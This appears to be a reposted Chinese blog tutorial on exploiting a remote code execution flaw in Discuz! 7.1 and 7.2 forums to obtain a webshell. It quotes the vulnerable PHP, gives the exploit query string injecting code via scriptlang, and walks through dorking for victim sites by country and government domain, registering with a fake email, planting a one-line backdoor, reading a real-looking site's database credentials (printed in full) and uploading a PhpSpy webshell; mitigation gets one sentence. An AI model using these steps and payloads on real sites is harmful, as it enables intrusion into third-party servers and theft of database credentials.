DZ7.1 and 7.2 0遠端代碼執行漏洞擷取Webshell
<b>Simeon [antian365.com]</b>
Crossday Discuz! Board 論壇系統(簡稱 Discuz! 論壇)是一個采用 PHP 和 MySQL 等其它多種資料庫建構的高效論壇解決方案。作為商業軟體産品, Discuz! 在代碼品質,運作效率,負載能力,安全等級,功能可操控性和權限嚴密性等方面有着良好的口碑。對于站長而言,利用 Discuz! 均能夠在最短的時間内,花費最低的費用,采用最少的人力,架設一個性能優異、功能全面、安全穩定的社群論壇平台。它能運作于Windows平台和Linux平台,目前已經有超過100萬的使用者。在本文以前Discuz! 論壇即時有漏洞也因為種種原因難以擷取Webshell,而本次出現的漏洞隻要是注冊使用者即可輕松擷取Webshell。在Discuz! 7.1與7.2版本中的showmessage函數,由于eval中執行的參數未初始化,可以任意送出,進而可以執行任意PHP指令。該漏洞的首發是T00ls核心團隊,下面來分析下這個遠端代碼執行漏洞,這個問題真的很嚴重,可以直接寫shell。
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危險的用法,未初始化的變量可以直接帶進函數,直接導緻了問題産生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&amp;', '&', $url_forward));
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
$extra = '';
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
include language('messages');
$vars = explode(':', $message);//隻要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//兩個數字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,可以自定義,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
......
}
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
三、misc.php正好有個可以自定義message的點,其實也是未初始化:
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response沒有初始化,可以自定義,from www.oldjun.com
}
showmessage函數裡$vars = explode(':', $message);然後message可以自己控制,于是就很容易了,參數是兩個自定義的數組。注冊一個使用者登陸,然後送出misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
在Google中進行Discuz!7.2的定位搜尋,在Google輸入框中輸入“Powered by Discuz!7.2 site:kr”搜尋南韓的Discuz!7.2版本的站點,如圖1所示,結果出來有3380條記錄。想搜尋哪個國家的就直接在site後面進行變更,例如搜尋國内的網站:“site:com.cn”,政府網站“site:org.cn”。
圖1定位搜尋Discuz!7.2版本的論壇
在圖1中從第一個往最末記錄,依次打開搜尋記錄,如圖2所示,第一個記錄技能打開,而且在其中還顯示為中文,單擊注冊連結,注冊為開論壇的一個使用者。注冊使用者時使用者名和密碼可以随意選取,隻要不重複即可,如果不想接收網站的注冊信件,防止被他人利用電子郵件進行其它活動可以使用假的郵件位址,如圖3所示,總之目的隻有一個那就是成為該論壇的會員,便于後期得到Webshell。
圖2 檢視搜尋結果
圖3 注冊使用者
discuz7.2 exp是由T00ls.net放出來的,呵呵,版權屬于他們哦!如圖4所示,在修改action的位址為“http://**********.co.kr/dc/misc.php”,該位址是misc.php的實際位址,修改完畢後儲存即可。
圖4修改exp代碼中的位址
使用者注冊成功後,在論壇中通過觀看最新文章可以看到位址欄中包含有TID一項,例如“http://www.antian365.com/redirect.php?tid=5634&goto=lastpost#lastpost”,其中的tid為“5634”。Tid顧名思義就是文章ID。擷取該ID後在exp中将該ID輸入後進行送出,如圖5所示。
圖5 擷取tid并将其放入exp中進行送出
技巧:
(1)在有些大的論壇中由于使用了優化技術,是以論壇的頁面都是靜态的,在靜态的頁面中是看不到tid的,例如“http://bbs.51cto.com/thread-648810-1.html”,但當滑鼠移動到回複按鈕處時會給出一個位址,該位址中包含有tid。
(2)Exp送出成功後會出現一些提示,如果給出“Binding Failed.Visit MSN IMME Q&A,Please.”提示,如圖6所示,則說明該系統已經修補了漏洞或者采取了一些安全措施,無法再進行利用。
圖6 未能成功的exp
(3)一句話木馬成功與否的測試。直接在論壇位址後加上“/forumdata/cache/usergroup_01.php”進行通路,例如某網站的論壇位址為:
http://www.xxx.com.hk/discuz/,則一句話後門的位址為:
http://www.xxx.com.hk/discuz/forumdata/cache/usergroup_01.php
如果通路後未出現錯誤提示,那麼恭喜你,成功了!
如圖7所示,在“lanker一句話PHP後門用戶端3.0内部版”的後門位址中輸入剛才送出的位址“http://**********.co.kr/dc/forumdata/cache/usergroup_01.php”,密碼是“cmd”。在子產品中選擇檢視伺服器基本資訊,如圖7所示,獲悉該系統為linux系統以及該網站所在的檔案路徑。
圖7 一句話後門執行成功
在子產品中選擇讀取檔案,并輸入資料庫連接配接檔案的位址“****/dc/config.inc.php”,如圖8所示,成功擷取該論壇資料庫的敏感資訊:
$dbhost = 'localhost'; // 資料庫伺服器
$dbuser = 'skycheer'; // 資料庫使用者名
$dbpw = 'sky0127'; // 資料庫密碼
$dbname = 'skycheer'; // 資料庫名
$pconnect = 0;
圖8擷取論壇資料庫連接配接資訊
使用一句話管理實在是不友善,在功能子產品中選擇上傳檔案,使用空的路徑直接将本地的大馬上傳到一句話木馬所在的路徑,上傳成功後直接通路,如圖9所示,成功得到我們熟悉的PhpSpy ver 2008界面。至此已經擷取Discuz!7.2版本的Webshell,大家都知道Discuz!論壇的Webshell很難拿到,是以本漏洞的珍稀程度可想而知。
圖9 上傳大馬
Discuz!7.1&7.2遠端溢出漏洞出來後,國内有關Discuz!的大中小論壇基本沒有什麼幸免,安全做的好的去掉了cache的執行權限,将其權限設定為無,逃過劫難。
本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/276114
![Apache配置SSLApache配置SSL[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)